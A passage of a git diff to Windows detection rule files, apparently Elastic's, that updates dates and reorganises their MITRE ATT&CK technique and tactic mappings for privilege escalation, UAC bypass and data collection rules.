"renamed-user-account" a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -93,27 +94,39 @@ reference = "https://attack.mitre.org/techniques/T1068/" id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml index c2d36fb1b78..cc533de6f4b 100644 --- a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml +++ b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -120,23 +120,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -146,6 +148,7 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -161,18 +164,34 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" @@ -183,10 +202,7 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml index db144eec549..fbb26f3b07c 100644 --- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml +++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,6 +87,7 @@ iam where host.os.type == "windows" and event.action == "changed-computer-accoun [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -96,15 +97,18 @@ reference = "https://attack.mitre.org/techniques/T1068/" id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 4f92ccdc7c3..5dd2e273789 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,53 +88,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml index 97b2898d655..280063046d8 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,53 +91,49 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index cc5a3e44aa3..0a42a979410 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,53 +85,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index 8763bfd5251..47b9cbe8d77 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,53 +101,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index db0e8042ad4..0589211912e 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,46 +92,28 @@ file where host.os.type == "windows" and event.type : "change" and process.name [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index c9cd1c4a1bb..3834bf21c19 100644 --- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -144,36 +144,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml index 8752086e4ee..e8e462a1c8b 100644 --- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml +++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -134,46 +134,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml index fa2fd7c192b..9afd4609252 100644 --- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -132,46 +132,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml index 4a8e99f0049..dedb007cc3a 100644 --- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml +++ b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/05" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -162,19 +162,46 @@ process.parent.name != null and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.012" name = "Process Hollowing" reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.004" +name = "Parent PID Spoofing" +reference = "https://attack.mitre.org/techniques/T1134/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index 5205c3c67f0..41942914eca 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,36 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.012" name = "Process Hollowing" reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml index cb89a43db4b..35c9d4192d8 100644 --- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml +++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,14 +93,18 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/collection_archive_data_zip_imageload.toml b/rules_building_block/collection_archive_data_zip_imageload.toml index 445af055e36..fe0eec74932 100644 --- a/rules_building_block/collection_archive_data_zip_imageload.toml +++ b/rules_building_block/collection_archive_data_zip_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -56,14 +56,18 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/collection_common_compressed_archived_file.toml b/rules_building_block/collection_common_compressed_archived_file.toml index 5742ea8c024..8b77228182d 100644 --- a/rules_building_block/collection_common_compressed_archived_file.toml +++ b/rules_building_block/collection_common_compressed_archived_file.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = "endpoint" maturity = "production" -updated_date = "2025/01/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,58 +76,64 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1074" name = "Data Staged" reference = "https://attack.mitre.org/techniques/T1074/" + [[rule.threat.technique.subtechnique]] id = "T1074.001" name = "Local Data Staging" reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" + [[rule.threat.technique.subtechnique]] id = "T1560.001" name = "Archive via Utility" reference = "https://attack.mitre.org/techniques/T1560/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1132" name = "Data Encoding" reference = "https://attack.mitre.org/techniques/T1132/" + [[rule.threat.technique.subtechnique]] id = "T1132.001" name = "Standard Encoding" reference = "https://attack.mitre.org/techniques/T1132/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.015" +name = "Compression" +reference = "https://attack.mitre.org/techniques/T1027/015/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/collection_files_staged_in_recycle_bin_root.toml b/rules_building_block/collection_files_staged_in_recycle_bin_root.toml index 5fd3ef741f5..e78b29e10e9 100644 --- a/rules_building_block/collection_files_staged_in_recycle_bin_root.toml +++ b/rules_building_block/collection_files_staged_in_recycle_bin_root.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -43,19 +43,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1074" name = "Data Staged" reference = "https://attack.mitre.org/techniques/T1074/" + [[rule.threat.technique.subtechnique]] id = "T1074.001" name = "Local Data Staging" reference = "https://attack.mitre.org/techniques/T1074/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/collection_microsoft_purview_dlp_signal.toml b/rules_building_block/collection_microsoft_purview_dlp_signal.toml index bfc6b8ca0b3..03a5db7e642 100644 --- a/rules_building_block/collection_microsoft_purview_dlp_signal.toml +++ b/rules_building_block/collection_microsoft_purview_dlp_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -56,13 +56,39 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules_building_block/collection_outlook_email_archive.toml b/rules_building_block/collection_outlook_email_archive.toml index 529eff840b9..ad3153f2733 100644 --- a/rules_building_block/collection_outlook_email_archive.toml +++ b/rules_building_block/collection_outlook_email_archive.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = 